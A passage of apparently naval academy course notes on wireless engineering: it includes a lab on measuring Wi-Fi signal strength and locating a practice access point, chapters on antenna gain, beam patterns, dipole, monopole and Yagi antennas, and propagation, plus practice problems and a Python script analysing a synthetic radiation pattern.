the cyber2_xx node, then right click and choose locate cyber2_xx and you should see it appear on the signal
history plot.
Question 1: For your cyber2_xx AP, write the following details down in the lower left corner of the map on the solution page.
SSID (Service Set Identifier) - the wireless network name
BSSID (Basic Service Set Identifier) - the MAC address of the wireless interface unit
Channel - allows the carrier frequency to be separated into bands to keep from overlapping
Frequency - carrier frequency the AP is using for communications
□ Now that we have Xirrus running, we can take some measurements of the signal strength. Look at the Networks display list in the middle (d above), find your AP, highlight it and note the dBm.
Question 2: Record the signal strength noted for your AP on the table on the last page of the lab under classroom.
Question 3: Assume you record the signal strength of some other fictional access point when you are standing next to it as -30 dBm. Next, you walk some distance away from it and take another signal strength measurement and record it as -33 dBm. By what factor has the signal strength dropped from measurement one to measurement two? (Hint: convert each measurement to mW, then divide measurement two by measurement one.) Recall that:
P(in mW) = 10^(PdBm / 10)
Keep this realization in mind when answering the following questions:
A SMALL CHANGE IN DECIBELS CAN MEAN A LARGE CHANGE IN POWER!
Question 4: Staying highlighted on your assigned AP, move from point to point on the map and record the signal
strength (dBm), allowing a period of time to let the value settle. Note if the dBm falls much below -90 it may drop from
your list. You can locate it again by returning closer to the classroom. Simply record -90 dBm if your AP is lost at
any point on the map.
Question 5: Convert your dBm measurements to mW and finish filling in the table.
Question 6: Observations:
a) At what locations did you receive the strongest signal?
b) The weakest signal?
c) Would you expect to stay connected to this AP in Maury Hall? Why?
d)
Have an instructor check your results.
II. The Hunt for an Unknown AP
□ Understanding how Xirrus reads signal strength, we will now try to locate an unknown AP using the Xirrus program. This AP is not located in your classroom, but you should be able to pick up the signal in your hallway.
a) Try to find the AP with SSID Bad_Egg_xx ( again with xx indicating your class room).
b) Turn On the “Locate Sound” in Settings and change the polling time to 1 second. Right click on Bad_Egg_xx
in the Networks list and select Locate. This will create a ping. The closer the pings are together, the stronger the
AP’s signal.
c) Begin walking through the lab deck following your ping, dBm and Radar in a direction that makes the signal
stronger.
Question 7: Where is the AP located? What is the message that is written on the AP?
Question 8: Emission control (EMCON) in the military refers to controlling your radio frequency emissions. Keeping “The Hunt” from above in mind, why might it be important to maintain radio silence at certain times in the Navy and Marine Corps?
This SX contributed by Captain Ryan Whitty, USMC.
Security Exercise 23 Answer Sheet
Name:
Questions 1/2/4/5:
Question 3:
______________________________________________________________________________
Question 6:
a)
b)
c)
d)
_________________________ Instructor/Lab Tech Signature
______________________________________________________________________________
Question 7:
______________________________________________________________________________
Question 8:
a)
b)
______________________________________________________________________________
Chapter 24: Antennas
Objectives:
(a) Describe the role of an antenna in a wireless communication system.
(b) Explain the difference between power gain and antenna gain, and compute an antenna's gain relative to an isotropic point
source (dBi).
(c) Describe the advantages and disadvantages of directional antennas.
(d) Describe the role of directors and reflectors in the design of a Yagi Antenna.
(e) Interpret an antenna's radiation pattern to determine the sidelobe level and front-to-back ratio in dB, the beamwidth, and the directions in which interfering or eavesdropping antennas may lie.
Connection to Cyber Security
Modulated signals are amplified to raise their power (Chapter 23), and then if free-space is the communication channel,
transmitted and received using an antenna. A necessary part of a free-space communication system, antennas serve as the
bridge from the transmitter and receiver to the communication channel. However, unlike a wire-based communication
system, free-space is an open medium, and anyone with an antenna can collect transmitted signals or transmit their own
signals. This makes free-space systems particularly vulnerable to cyber attacks involving eavesdropping and jamming.
I. Antenna Characteristics
An antenna is a device that provides a transition between guided electromagnetic waves in electrical circuits and electromagnetic waves in free space, and can be a length of wire, a metal rod, or a piece of metal tubing. Recall that the wavelength (λ) and frequency (f) of an electromagnetic wave in free space are related by the speed of light (c), where c = 3.0 x 10^8 m/s:
λ = c / f .
The length of an antenna is usually expressed in terms of the wavelength (λ) of the frequencies being transmitted.
 Low frequencies imply long wavelengths, hence low frequency antennas are very large (for example, the towers across the Severn River are used for the VLF Submarine Broadcast, 30 kHz, and are hundreds of feet high).
 High frequencies imply short wavelengths, hence high frequency antennas are usually small (for example, the Dish Network transmission frequency from the satellite to your satellite dish is 12 GHz, and the antenna is approximately 1 cm long).
Antennas are dual function, meaning that an antenna designed to transmit a certain frequency can also receive that frequency.
When selecting an appropriate antenna for a communication system, there are four key criteria that must be evaluated:
antenna gain, antenna beam pattern/beamwidth, antenna bandwidth and physical size.
1. Gain – Antennas are not amplifiers, as you saw in Chapter 23, and the power out of the antenna is no more than the
power in. However, because antennas focus power in certain directions, we say that an antenna can have a gain.
Antenna gain determines how concentrated the transmitted power is in a particular direction (usually the direction of
maximal radiation), or how well the antenna can receive signals from a particular direction. Higher gain means a
stronger signal, making communication over longer distances possible. Conversely, we could communicate over the
same distance with less transmit power. Note that some antennas use a parabolic dish to further increase antenna
gain (such as the satellite dish for home satellite TV—the actual antenna is still 1 cm long, but the dish is much
bigger).
Isotropic antennas are theoretical antennas that have no directionality, and radiate their power equally in all
directions. Consider the figure below. On the left is an isotropic antenna, located at the center of the sphere. The
power it transmits is spread equally in all directions, in a spherical shape. If it transmits 1 W, that 1 W will be spread
over the surface of the sphere, so as you move farther from the antenna, the received power per unit area drops
dramatically. On the right is a directional antenna. If this antenna also transmits 1 W, that power is spread over a
much smaller surface area, as indicated, so that in the direction the antenna is pointing, the reduction in power is
much less as you move farther from the antenna. The antenna gain is a measure of power transmitted by a
directional antenna in the direction it is pointing relative to that transmitted by an isotropic source.
The mathematical definition of antenna gain is
G = (radiated power density at distance x from the directional antenna) / (radiated power density at distance x from an isotropic antenna) .
If we convert this to decibels, because we are comparing relative to an isotropic antenna, it is common to use dBi instead of dB. To compute antenna gain in decibels, we have
GdBi = 10 log10(G) (dBi).
Similarly, to convert from dBi to ratio we use
G = 10^(GdBi / 10) (unitless).
Light can be used as an analogy to antenna gain. Imagine a single light bulb five feet from a wall. The light bulb
sends light equally in all directions similar to how an isotropic antenna sends radio waves equally in all directions.
When we put the lightbulb in a flashlight, the design of the flashlight focuses light in a single direction and the
portion of the wall still illuminated by light will consequently be brighter. This is similar to how a directional
antenna focuses radio waves in a particular direction and is able to affect communications over longer distances
(e.g., satellite communications). Antenna gain can be thought of as how much brighter the wall is with the flashlight
versus how bright it was with only the light bulb.
A related characteristic of transmitting stations in a wireless communication system is the Effective Isotropic
Radiated Power (EIRP), which is the product of the transmit power and the antenna gain:
EIRP = Pt Gt (Watts)
Here, the subscript t indicates that this is transmitter power and transmit antenna gain. In decibels,
.
EIRP is the amount of power that an isotropic antenna would have to transmit to achieve the same received power as
a directional antenna at the same distance.
To better explain this, let’s return briefly to our flashlight analogy. Let’s say I have 1W being sent into my flashlight
which is five feet from the wall. The wall will then be a certain brightness. If we then remove the lightbulb from the
flashlight and stay five feet away, the wall will get dimmer as we’ve previously discussed. EIRP is how much power
I would now need to send into the lightbulb, without the flashlight, in order to make the wall as bright as it was with
the flashlight.
An antenna with directional gain has some advantages over an isotropic antenna. These include:
 Because energy is only sent in the desired direction, the possibility of interference with other transmitters at
or near the same frequency is reduced.
 More focused power results in increased gain, which means that less power is required.
 Controlling the direction of the beam can help prevent eavesdropping since you must be in the beam in order
to receive the signal.
 A narrow beam can reduce the likelihood of detection in a covert setting for the same reason as was just
discussed.
However, directional antennas don’t work well in mobile situations (imagine keeping your cell phone pointed at a
cell tower as you’re driving past it) and they can be physically large if gain is big.
Practice Problem 24.1
A radio station has an EIRP of 25 kW and a transmit power of 1.73 kW. What is the gain of the antenna?
2. Beam Pattern/Beamwidth – Beam pattern is a diagram that shows specifically what direction(s) the antenna favors.
You can think of a radiation pattern being created by having an antenna radiate a constant power (say 1 W, although
any power will do), and then with a power meter, walk in a complete circle 1 km (or any other constant distance)
from the antenna and record the power received at each point along the circle. The result will look something like
the following figure.
An example radiation pattern is shown in this figure in red. In this pattern, relative bearings are shown with 0° being
the direction the antenna is pointing. In this figure, each circle represents a change in received power of 3 dB, and
the maximum power is along the 0° bearing. There are six lobes of transmitted power showing. The mainlobe is
oriented towards 0°, the direction the antenna is pointing. There are four sidelobes, oriented towards ±60° and
±120°, and a backlobe, oriented towards 180° (directly away from where the antenna is pointing).
In many cases, the mainlobe’s maximum value will be defined as 0 dB, and the power levels at all other points on
the pattern are the number of dB less than the max; this is a measure of power relative to the max power.
This form of a radiation pattern is only one of many that could be used; sometimes the rings are not in dB,
sometimes they represent power density (W/m2), or power (dBW or dBm), etc. But the general features of the beam
pattern will be similar. In actuality, antennas radiate in 3-dimensions but the radiation patterns we will focus on are
2-dimensional, like the one shown above.
From the radiation pattern, a few new terms that describe the properties of the antenna come about. The sidelobe
level (SLL) is a measure of the strength of the sidelobes compared to the mainlobe in decibels. The sidelobe level is
measured from the peak of the main lobe to the peak of the largest sidelobe. Mathematically,
$$SLL_{dB} = G_{mainlobe}(\text{dB}) - G_{sidelobe}(\text{dB}).$$
For the antenna with radiation pattern on the previous page, the largest sidelobes are at ±60°, so $SLL_{dB} = 0\ \text{dB} - (-16\ \text{dB}) = 16\ \text{dB}$.
Similarly, the front-to-back ratio (FBR) is a measure of the strength of the mainlobe to the strength
of the back lobe in decibels. Mathematically,
$$FBR_{dB} = G_{mainlobe}(\text{dB}) - G_{backlobe}(\text{dB}).$$
For the antenna with radiation pattern on the previous page, the backlobe is at –17 dB, so the front-to-back ratio is
$FBR_{dB} = 0\ \text{dB} - (-17\ \text{dB}) = 17\ \text{dB}$.
Finally, note that the radiation pattern has some bearings that are not a part of any lobe, for example ±35°. These are
called nulls of the pattern, and at these bearings, no power is transmitted from this antenna (or perhaps a minuscule
amount), nor can this antenna receive signals from these bearings.
3. Beamwidth – Beamwidth is based on the relative bearings where transmitted (or received) power is reduced by a
factor of ½ (or -3 dB, since $10 \log_{10}(\tfrac{1}{2}) = -3$) from the direction of max power. We call these points on the diagram
the -3 dB (or half-power) points. The beamwidth is the angle that subtends these points. The following figure shows
the beamwidth computation for the above beam pattern; the beamwidth is 20°. A narrow beamwidth (small angle)
means the antenna is very directional.
4. Bandwidth – Bandwidth determines the range of frequencies that the antenna is best suited for. Broadband signals
(that is, signals with a very wide bandwidth) transmit more data at a faster data rate, but broadband antennas are
harder to design/build. An antenna is normally designed for a certain transmit frequency, but can be used
successfully for a range of frequencies around that.
5. Physical Size – Physically larger antennas have a higher gain and narrower beamwidth, but are much harder to
conceal. Also, the system using the antenna may introduce its own constraints (e.g., no one wants to mount a 6 meter
dish on the roof of their car). Antennas radiate most effectively when their length is directly related to the
wavelength of the transmitted signal. Most antennas have a length that is some fraction of a wavelength. One-half
and one-quarter wavelengths are most common.
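As an added example (not part of the course notes), the following Python script builds a constructed radiation pattern with the lobe layout described above (mainlobe at 0°, sidelobes at ±60° and ±120°, backlobe at 180°) and extracts the sidelobe level, front-to-back ratio and half-power beamwidth from it, the way one would from a set of power-meter readings taken around the circle. The pattern values are synthetic assumptions, not measurements of any real antenna.

```python
# Constructed radiation pattern (not measured data). Each lobe is parabolic in dB,
# so it is exactly 3 dB down at +/- halfwidth degrees from its centre: the mainlobe
# therefore has a known half-power beamwidth of 2 * 10 = 20 degrees, matching the
# pattern discussed in the text. Tuple: (centre_deg, peak_dB, halfwidth_deg).
LOBES = [
    (0, 0.0, 10),                        # mainlobe, boresight defined as 0 dB
    (60, -16.0, 8), (-60, -16.0, 8),     # largest sidelobes
    (120, -20.0, 8), (-120, -20.0, 8),   # smaller sidelobes
    (180, -17.0, 8),                     # backlobe
]
NULL_FLOOR_DB = -40.0  # anything this far down is treated as a null


def angular_diff(a, b):
    """Signed difference a - b in degrees, wrapped into [-180, 180)."""
    return ((a - b + 180.0) % 360.0) - 180.0


def pattern_gain_db(bearing):
    """Relative gain (dB below the mainlobe maximum) at a relative bearing."""
    values = [NULL_FLOOR_DB]
    for centre, peak, halfwidth in LOBES:
        x = angular_diff(bearing, centre) / halfwidth
        values.append(peak - 3.0 * x * x)
    return max(values)


def sample_pattern():
    """Walk the full circle at constant range in 1-degree steps, as the text
    describes, recording relative power: returns a list of (bearing_deg, gain_dB)."""
    return [(b, pattern_gain_db(b)) for b in range(-180, 180)]


def find_lobes(samples, threshold_db=-30.0):
    """Return (bearing, gain_dB) for every local maximum above threshold_db.
    Neighbour indices wrap around so a lobe straddling +/-180 is still found."""
    n = len(samples)
    lobes = []
    for i, (bearing, gain) in enumerate(samples):
        prev_gain = samples[(i - 1) % n][1]
        next_gain = samples[(i + 1) % n][1]
        if gain > prev_gain and gain >= next_gain and gain > threshold_db:
            lobes.append((bearing, gain))
    return lobes


def classify_lobes(lobes):
    """Mainlobe = strongest lobe; backlobe = the lobe farthest in bearing from it
    (180 degrees away); everything else is a sidelobe."""
    main = max(lobes, key=lambda lobe: lobe[1])
    others = [lobe for lobe in lobes if lobe != main]
    back = max(others, key=lambda lobe: abs(angular_diff(lobe[0], main[0])))
    sides = [lobe for lobe in others if lobe != back]
    return main, back, sides


def sidelobe_level_db(lobes):
    """SLL_dB = G_mainlobe(dB) - G_sidelobe(dB), measured to the largest sidelobe."""
    main, _, sides = classify_lobes(lobes)
    return main[1] - max(gain for _, gain in sides)


def front_to_back_ratio_db(lobes):
    """FBR_dB = G_mainlobe(dB) - G_backlobe(dB)."""
    main, back, _ = classify_lobes(lobes)
    return main[1] - back[1]


def half_power_beamwidth_deg(samples, main_bearing):
    """Angle subtended by the two -3 dB (half-power) points either side of the
    mainlobe peak, linearly interpolated between the 1-degree samples."""
    gains = dict(samples)
    peak = gains[main_bearing]
    target = peak - 3.0

    def edge(direction):
        prev_gain = peak
        for k in range(1, len(samples) // 2):
            bearing = int(angular_diff(main_bearing + direction * k, 0))
            gain = gains[bearing]
            if gain <= target:
                # crossed the -3 dB level between k-1 and k degrees: interpolate
                return (k - 1) + (prev_gain - target) / (prev_gain - gain)
            prev_gain = gain
        raise ValueError("no -3 dB point found on this side of the mainlobe")

    return edge(+1) + edge(-1)


if __name__ == "__main__":
    samples = sample_pattern()
    lobes = find_lobes(samples)
    print(f"lobes found: {len(lobes)} at bearings {sorted(b for b, _ in lobes)}")
    print(f"SLL = {sidelobe_level_db(lobes):.1f} dB, FBR = {front_to_back_ratio_db(lobes):.1f} dB")
    print(f"half-power beamwidth = {half_power_beamwidth_deg(samples, 0):.1f} degrees")
```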
Practice Problem 24.2
Consider the antenna with this radiation pattern:
1. What is the beamwidth of this directional antenna?
2. What is the sidelobe level?
3. What is the front-to-back ratio?
4. Will a station transmitting bearing 90° interfere with me?
Will I interfere with it?
5. Will a station bearing 240° be able to eavesdrop on my communications?
6. Suppose the receiver I am communicating with (at 0°) requires that the signal received be at least 1 pW. Will I have to
transmit more power or less power using this antenna than if I were using an isotropic antenna? Why?
II. Dipole Antenna
One of the most widely used antenna types is the half-wave dipole. A dipole antenna is two pieces of wire, rod, or tubing that
are one-quarter wavelength long at the operating frequency connected to a voltage source (these are the poles). The antenna is
formed by placing these poles at a 90° angle from the transmission lines that are carrying the signal to be transmitted. This is
depicted in the figure below. The most efficient radiation of EM waves comes when the total length of the antenna is λ/2
long, which is why the antenna is called the half-wave (λ/2) dipole antenna.
The radiation pattern for a horizontally oriented dipole antenna is shown below (on the left). The dipole is the heavy black
line segment. The scale is not in dB, but this is the general shape. It is bidirectional, in that there is a backlobe that is as large
as the mainlobe, both emanating perpendicular to the orientation of the dipole. If the dipole is oriented vertically, the
radiation pattern is omnidirectional, as shown on the right.
The 3-dimensional radiation patterns for the horizontally and vertically mounted dipole are shown on the next figure. Note
that the 2-dimensional patterns above are cutaways of the 3-dimensional patterns.
Major Parameters for the Dipole Antenna:
1. Beam Pattern/Beamwidth – A dipole mounted vertically has the 2-dimensional beam pattern in the azimuth plane
shown in the figure on the previous page, and a -3 dB beamwidth of 78°. The vertically mounted antenna has an
omnidirectional pattern in the azimuth (energy is spread equally in all directions).
2. Gain – A dipole has a gain of G = 1.64, or G(dBi) = 2.15 dBi.
3. Bandwidth – A dipole typically has a bandwidth that is ~25% of the center frequency of transmission.
4. Physical Size – A dipole has a physical size equal to λ/2, where λ is the wavelength of transmission.
Practice Problem 24.3
A transmitter feeds a half-wave dipole antenna with 100 watts of power. Calculate the Effective Isotropic Radiated Power
(EIRP).
Practice Problem 24.4
How long would a dipole antenna be for AM 1100?
III. Monopole Antenna
The quarter-wave (λ/4) monopole antenna, also called a Marconi antenna, is widely used. Its characteristics are similar to
those of a vertically mounted dipole antenna, except that the monopole is connected to a ground plane (such as the earth),
and uses it as a type of electrical “mirror” to reflect transmitted or received energy upwards to contribute to the upper part
of the radiation pattern. Effectively, the ground plane acts as the “missing” half of a dipole antenna. The 3-dimensional
radiation pattern for the vertically mounted λ/4 monopole is shown in the following figure (on the left), and a slice of the
pattern (2-dimensional pattern in the vertical direction) is shown on the right.
Major Parameters for the Monopole Antenna
1. Beam Pattern/Beamwidth – A monopole has an omnidirectional pattern in the azimuth (energy is spread equally in all
directions), and a -3 dB beamwidth of 45° in the vertical plane.
2. Gain – A monopole has a gain of G = 1.45, or G(dBi) = 1.6 dBi.
3. Bandwidth – A monopole typically has a bandwidth that is ~10% of the center frequency.
4. Physical Size – A monopole has a physical size equal to λ/4.
Practice Problem 24.5
The ballistic submarine, USS Alaska, has gone alert. They must stream a floating wire monopole antenna to get their alert
signal. If the alert signal is transmitted at 30 kHz, how far should they stream their antenna? (note: the antenna being
streamed is a straight wire)
IV. Yagi (Yagi-Uda) Antenna
The Yagi-Uda was developed in Japan in 1926 by Professor Hidetsugu Yagi and his student Shintaro Uda. Their basic
concept and structure is still used across a wide variety of modern antenna designs, and the Yagi-Uda is still the “go-to”
antenna for high gain at VHF and UHF frequencies. There was a time when every home in America had a Yagi antenna on
its roof to allow reception of broadcast television.
A Yagi antenna is composed of a driven-element (a dipole antenna) and multiple parasitic elements. A driven-element is one
that is connected electrically to the transmitter. Parasitic elements are not connected electrically, but are placed in the vicinity
of the driven element to either side. These parasitic elements (known as reflectors and directors) will resonate with the
electric field produced by the dipole. Reflectors are longer than the dipole antenna, are all placed on one side of the dipole,
and reflect the transmitted EM waves back towards the dipole antenna. Directors are shorter in length than the dipole, and
“direct” EM waves from the dipole and reflectors to form the mainlobe. Judicious spacing of the parasitic elements will allow
us to produce constructive interference and “push” energy in the forward direction, giving the Yagi-Uda good gain. The
effect of directors and reflectors is:
 More parasitic elements means higher gain and narrower beamwidth.
 Adding more directors is more effective than adding more reflectors.
 The greater the number of directors, the higher the gain and the narrower the beamwidth.
 However, we get diminishing returns as more elements are added. Most Yagi antennas have 1 reflector and 1-20
directors.
Here is a Yagi-Uda with one director and one reflector. This is a three-element Yagi.
The simplest Yagi, consisting of a driven element and one reflector, shown on the bottom of the prior page, has a gain of
about 5 dBi.
Practice Problem 24.6
What is the length of the driven element in a Yagi at 290 MHz?
A manufacturer of Yagi antennas is the L-Com Global Connectivity corporation (www.l-com.com). Here’s an example
pattern of one of their 900 MHz Yagi antennas (model HG906YE-RSP). The driven element (dipole) has a cable connected
to it. This Yagi has 1 reflector and 2 directors, and a gain of 6 dBi. The horizontal beamwidth is 100°, vertical beamwidth
60°.
Compare that to their model HG914YE-RSP antenna, which has 1 reflector, 11 directors, and 14 dBi of gain. The horizontal
beamwidth is 31°, vertical beamwidth 28°.
All else being equal, is the antenna with the higher gain a “better” antenna? Well, unfortunately all else is not equal.
The 6 dBi Yagi is only 14.2 inches long while the 14 dBi Yagi is a whopping 60 inches (that’s 5 full feet) long, almost six
times the length of the 6 dBi antenna. If constrained by size, the 6 dBi antenna may be the better choice.
Although the Yagi antenna does a good job at directing (and receiving) energy from the forward direction (in the main lobe),
its sidelobes are fairly large in comparison.
Major Parameters for the Yagi Antenna
1. Beam Pattern/Beamwidth – A Yagi is a directional antenna that transmits energy in a main lobe, but with fairly high
side lobe levels. The beamwidth is dependent on the number of parasitic elements, with more elements resulting in a
narrower beamwidth.
2. Gain – A Yagi’s gain is directly proportional to the number of parasitic elements, with typical gains in the range of
5-20 dBi (you will never be asked to calculate the gain of a Yagi antenna based on its dimensions).
3. Bandwidth – A Yagi is typically very narrowband, with a bandwidth ~5% of the center frequency.
4. Physical Size – A Yagi’s dipole radiator has a physical size equal to λ/2, but the length is determined by the number of
directors. Directors are typically spaced in half-wavelength increments.
You should be familiar with the four major parameters for the following three antennas:
 Dipole
 Monopole
 Yagi-Uda
Problems
1. What are the 4 engineering factors associated with the design of antennas?
2. a) Calculate the length, in meters, of a dipole antenna that is designed to receive a station at AM 800 on the dial of an
AM radio.
b) Calculate the length, in meters, of a monopole antenna that is designed to receive the FM station at 107.1 MHz.
3. Given the following radiation pattern, where each ring represents a 1 dB change in power, what is the beamwidth? The
sidelobe level? The front-to-back ratio?
4. Given the following radiation pattern, where each ring represents a 2 dB change in power, what is the beamwidth? The
sidelobe level? The front-to-back ratio?
5. The power applied to an antenna with a gain of 4 dB is 13 W. What is the EIRP?
6. What does it mean for an antenna to have directivity, and what are the advantages and disadvantages of a directional
antenna?
7. Name and describe the three basic elements in a Yagi antenna.
8. The length of the driven element in a Yagi antenna is 900 mm; what is its operating frequency?
9. The mainlobe of an antenna has a maximum gain value of +18 dB at its peak point of forward direction. The same
antenna has a gain of −5 dB at the peak point of its rear lobe. Determine the front-to-back ratio of the antenna.
10. Yagi antennas A and B both have a driven element designed to transmit/receive 100 MHz. Yagi antenna A has 1 director
and 3 reflectors, while Yagi antenna B has 1 director and 7 reflectors. Describe the differences you would expect to see
in their radiation patterns.
Security Exercise 24
Reserved.
Chapter 25: Propagation
Objectives:
(a) Define reflection, refraction, diffraction and scattering.
(b) Describe the characteristics of ground waves, sky waves, and space waves.
(c) Calculate the radio horizon distance for space waves based on antenna height.
(d) Compute received power level for a communication system using Friis Free Space equation.
(e) Using the log-normal propagation model, compute received power, path loss or transmission distance.
Connection to Cyber Security
In a wireless communication system, the transmitter transmits a modulated signal into free-space using an antenna. The
signal then propagates through free-space until it reaches the receive antenna. Along the way, the transmitted signal loses
power, so that by the time it gets to the receiver, the received power can be extremely low. If the received power is too low,
the receiver will not be able to recover the information. In this chapter, you’ll be introduced to the various ways that signals
can propagate through free-space, and also how to compute the received power. Cyber attacks against wireless
communication systems can take advantage of a low received signal power to jam the transmission, or to take control of the
communication link.
I. Wireless Propagation
Propagation is the means by which a signal moves from Point A to Point B. It sounds simple, but it is the most fundamental
and challenging aspect of wireless communications. In a wired system (such as an Ethernet network), propagation is not
really a concern per se. However, wireless transmission requires a fundamental understanding of how electromagnetic waves
move through the atmosphere. The challenges of propagation in free-space include the fact that the transmitter and/or
receiver may be moving, obstacles in the path of propagation, a path that is not necessarily a straight line, and a signal that
takes various paths to get to the receiver.
In general, we can think about radio frequency propagation in two broad categories: large scale and small scale. Our
emphasis in EC310 is on understanding large scale propagation (longer distance), although many engineers have devoted
their entire careers to understanding and modeling small scale propagation. In fact, you’ve likely experienced a small scale
propagation issue numerous times without ever realizing it. The classic example would be driving down the highway while
talking on your cell phone and experiencing a dropped call.
Large Scale Propagation – The behavior of the radio channel over large distances (100s or 1000s of wavelength of
distance). Received power is directly related to distance between Tx and Rx, and is stationary with respect
to time.
Small Scale Propagation – The behavior of the radio channel over a small local area (1-10 wavelengths of
distance) and/or of small time durations. Received power fluctuates rapidly based on position, speed,
direction of travel, etc. of the mobile.
II. Large Scale Propagation
A. Physical Phenomena
Large scale propagation is affected by four physical phenomena:
 Reflection – the bouncing of EM waves off of surrounding objects, such as vehicles, buildings, etc.
 Refraction – the bending of EM waves as they travel through mediums of different material
 Diffraction – bending of EM waves around objects
 Scattering – diffuse re-radiation of EM waves off rough (smaller than the signal’s λ) objects
Let’s look at these briefly one at a time.
1. Reflection – Reflection occurs when a transmitted EM wave strikes a conductive object (such as a metallic object) on
its path to the receiver. As you recall from physics, in reflection, if the object is flat, the angle of reflection is equal to the
angle of incidence.
2. Refraction – When an EM wave passes from one medium to another, the EM wave’s path can change direction (bend).
In wireless communications, we see this when EM waves directed towards the sky go up into the ionosphere, and
eventually bend back down to earth as depicted in the figure below.
3. Diffraction – Diffraction is the bending of EM waves around objects in their path, even behind them to some extent.
Consider a transmitter and receiver where an object is blocking the direct line-of-sight path between them. The signal
can diffract around the object such that the signal can get to the receiver even though it is shadowed. Note that the more
deeply the receiver is shadowed, the lower the received power, and in some cases, the receiver may not be able to receive
any signal. The concept of diffraction is illustrated below.
4. Rough Surface Scattering – Sometimes called diffuse scattering or diffuse reflection, scattering happens when an EM
wave impacts a rough surface and is re-radiated in many directions at much reduced power levels.
So those are the basic physical phenomena of propagation. What happens when we add in a real earth and a real atmosphere?
The earth and the earth’s atmosphere have the greatest impact on signals in the VLF – HF range (3 kHz – 30 MHz). It’s not
that the earth and atmosphere don’t affect signals at higher frequencies, it’s just at those higher frequencies other factors
come into play and dominate the effects of the earth/atmosphere. Let’s look at what happens to these lower frequencies first
before moving on to the higher frequencies.
Frequency Band                  Frequency Range     Propagation Mode
VLF (Very Low Frequency)        3 kHz – 30 kHz      Ground waves
LF (Low Frequency)              30 kHz – 300 kHz    Ground waves
MF (Medium Frequency)           300 kHz – 3 MHz     Ground waves, sky waves at night
HF (High Frequency)             3 MHz – 30 MHz      Sky waves
VHF (Very High Frequency)       30 MHz – 300 MHz    Space waves
UHF (Ultra High Frequency)      300 MHz – 3 GHz     Space waves
SHF (Super High Frequency)      3 GHz – 30 GHz      Space waves
EHF (Extremely High Frequency)  30 GHz – 300 GHz    Space waves
B. Modes of Propagation
For VLF-HF communications, there are three basic modes a radio wave can travel from the transmitter to a receiving
antenna:
 Ground wave – EM waves that travel close to the surface of the earth
 Sky wave – EM waves that travel up into the atmosphere and then bend back to earth
 Space wave – EM waves that travel in a straight line (direct line-of-sight or LOS)
The frequency of the radio wave is the most important factor in determining the mode and performance of each mode of
propagation.
1. Ground Wave Propagation – A ground wave is a radio wave that travels along the earth’s surface (also referred to as
a surface wave). A ground wave must be vertically polarized; that is, the antenna must be oriented vertically.
Lower frequencies travel efficiently as ground waves because they are diffracted by the surface of the earth. Ground
waves thus follow the curvature of the earth and can travel beyond the horizon, for hundreds of miles. Ground wave
propagation is strongest in the LF and MF frequency ranges. Ground wave propagation constitutes the main signal path
for signals in the frequency range from 30 kHz – 3 MHz.
2. Sky Wave Propagation – Sky waves are radiated by an antenna into the upper atmosphere where they are reflected or
refracted back to earth. The air molecules of the ionosphere are subject to severe radiation from the sun. Ultraviolet
radiation causes the molecules to ionize, or separate into charged particles, positive and negative ions. This separates the
upper atmosphere into different layers (or mediums) that promote reflection or refraction.
The direction of reflection depends on the angle at which the radio wave enters the atmosphere and the different degrees
of ionization of the layers, as well as the frequency of the transmission.
3. Space Wave Propagation – A space wave refers to the radio wave that travels directly in a straight line from the
transmitting antenna (LOS). These waves are not refracted, and do not follow the curvature of the earth. The chief
limitation of a space wave is that it is limited to line-of-sight distances. The range of space wave propagation is limited
by the curvature of the earth and height of the antennas above the earth’s surface.
If an antenna has a height h above the surface of the earth, the distance, d, to the radio horizon (which is the maximum
range for space wave communications from that antenna) is given by the formula
$$d = \sqrt{2h}.$$
Important: In this formula, the height of the antenna is in feet, and the distance to the horizon is in miles. That is, if you
plug in the antenna height in feet, the resulting distance value will be in miles.
The next figure demonstrates the maximum distance that two stations can be apart and still conduct line-of-sight
communication. This figure shows one antenna of height h1 and a second antenna of height h2. The maximum separation
at which they can still communicate by line-of-sight is given by:
$$d_{total} = \sqrt{2h_1} + \sqrt{2h_2}.$$
Practice Problem 25.1
What is the longest line-of-sight communication range between a transmitter whose transmitting antenna is 350 feet high and
a receiver whose receiving antenna is 25 feet high?
Now that we’ve covered all the glories of Large Scale Propagation in real-world environments, it behooves us to look at the
most basic way we can transmit energy from Point A to Point B in an environment devoid of terrain, mountains, buildings,
ground, or atmosphere. Such an environment is known as Free Space, and conveniently, wireless propagation in such an
environment is known as Free Space Propagation.
III. Free Space Propagation
Let’s consider the following scenario. You have a brand-new iPhone (or Samsung phone as the case may be), have just
signed up for a super-fast LTE plan, and would like to upload a photo, surf the web, browse Facebook, or just plain make a
phone call. To make that happen, your phone has to transmit that information over the air to the nearest LTE cell tower (cost:
$5 Million, that’s why your phone bill is $100/month), which happens to be 5 miles away.
Question: Will your signal make it to the tower and will it have sufficient power to “close the link” and allow you to
communicate? Or will you suffer the fate of a cellular “dead zone”? That depends on the amount of signal power that is
received.
Recall from Chapter 24 the discussion of antenna gain. An antenna has gain if it can focus its transmitted power (or can
receive power) in a certain direction, as opposed to an isotropic antenna that radiates (or receives) power equally in all
directions (in a spherical shape). This led to the term effective isotropic radiated power (EIRP), which is the amount of power
an isotropic antenna would have to radiate in order to match the power that a directional antenna radiates in the direction it is
pointing. To figure out how to compute received power, let’s consider how an isotropic antenna radiates in a spherical shape.
As EM waves move away from the isotropic antenna, the sphere gets larger and larger, until it touches our receive antenna.
The transmitter transmits a constant power, however, the power density is going to decrease as the distance from the transmit
antenna increases. Power density is the amount of power received per unit area (W/m²). The power density that reaches the
receive antenna is going to be based on the surface area of a sphere, where the distance between the transmitter and receiver
($d$) is the radius of the sphere. Since the surface area of a sphere of radius $d$ is given by
$$A_{sphere} = 4\pi d^2,$$
the power density ($P_d$) at the receiver in units of W/m² is:
$$P_d = \frac{P_{isotropic\ antenna}}{A_{sphere}} = \frac{EIRP}{4\pi d^2} = \frac{P_t G_t}{4\pi d^2}.$$
Now, the last thing we need to do is to turn that power density into the actual received power. Power density is power per unit
area, so what is the “area” we are interested in? Since we are receiving the signal on an antenna, the “area” of interest is the
area of the receive antenna. The derivation of the effective area of an antenna is beyond the scope of the course, but it is
mathematically defined as:
$$A_e = \frac{G_r \lambda^2}{4\pi}.$$
Finally, we can put all this together and determine the equation for received power, which is received power density (W/m²)
multiplied by effective area (m²):
$$P_r = P_d \times A_e = \frac{P_t G_t}{4\pi d^2} \times \frac{G_r \lambda^2}{4\pi} = \frac{P_t G_t G_r \lambda^2}{(4\pi d)^2}$$
where the variables are defined as:
  $P_r$       Received power (W or mW)
  $P_t$       Transmitted power (W or mW)
